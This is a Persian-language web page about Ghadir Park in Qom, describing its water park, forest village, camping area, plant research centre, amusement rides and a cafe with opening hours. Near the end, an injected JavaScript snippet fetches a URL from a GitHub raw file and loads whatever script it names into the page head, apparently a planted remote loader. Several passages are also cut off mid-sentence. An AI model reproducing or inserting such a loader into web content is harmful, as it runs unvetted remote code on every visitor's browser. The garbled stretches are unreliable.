درباره بوستان غدیر قم

  • بوستان غدیر قم یکی از بزرگترین و زیباترین بوستان های شهری استان قم است که دارای امکانات تفریحی و رفاهی متنوعی است. این بوستان در بلوار غدیر واقع شده و

    در بوستان غدیر پارک بزرگ آب و تاب و باغ رستوران آب و تاب که شامل اسلاید های آبی، استخر های مختلف، رستوران، کافی شاپ و … است.
    دهکده جنگلی کاج که شامل رستوران، پیست کارتینگ، کافی شاپ، فضای سبز و پوشش گیاهی پارک جنگلی و … است.
    کمپینگ زائر که شامل آلاچیق، سکوی چادر زدن، نمازخانه، سرویس بهداشتی، آبخوری، پارکینگ، زمین های بازی و … است.
    مرکز تحقیقات گل ها و گیاهان زینتی غدیر که شامل گلخانه ها، باغ ها، آموزشگاه ها و … است.
    طرح های در دست اجرای بوستان غدیر که شامل بزرگترین شهربازی قم، تالارهای پذیرایی، سالن های چند منظوره، دریاچه مصنوعی و … است.
    بوستان غدیر قم یک مقصد سرسبز و پرآبان برای گردشگران و مردم شهر قم است که می توانید در آن لحظات خوشی را سپری کنید

    که در بوستان غدیر قم واقع شده است. این شهربازی در مساحتی به وسعت ۴۷ هزار مترمربع شامل بازی‌های هیجان‌انگیز و متنوعی است که برخی از آنها عبارتند از:

    شهربازی – کشتی صبا: یک بازی مکانیکی که با حرکت نوسانی و چرخشی مسافران را به سمت بالا و پایین می‌برد.

    تیوپ پرنده: یک بازی مکانیکی که با حرکت دورانی و چرخشی مسافران را در هوا می‌چرخاند

    کارتینگ : یک بازی موتوری که مسافران می‌توانند با ماشین‌های کوچک و سریع در یک پیست مسابقه دهند.
    این شهربازی همچنین دارای رستوران، کافی شاپ، پارکینگ، سرویس بهداشتی و نمازخانه است4. این شهربازی یک مکان مناسب برای تفریح و سرگرمی خانوادگی است که می‌توانید در آن لحظات شادی را تجربه کنید.

    مجتمع تفریحی کهکشان غدیر واقع در بوستان غدیر

    و پذیرایی کهکشان غدیر است که در بلوار غدیر قم واقع شده است. این کافه دارای منوی متنوعی از نوشیدنی ها، دسر ها، ساندویچ ها و پیتزا ها است که با کیفیت بالا و قیمت مناسب ارائه می شود. این کافه همچنین دارای محیطی دلنشین و مدرن با دکوراسیون زیبا و موسیقی آرامش بخش است که می توانید در آن با دوستان و خانواده خود لحظات خوشی را سپری کنید. این کافه از ساعت 10:30 الی 18 باز است و شماره تلفن آن 025-32230 است

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۴ از ۵
    از مجموع ۲ رای

    دیدگاهتان را بنویسید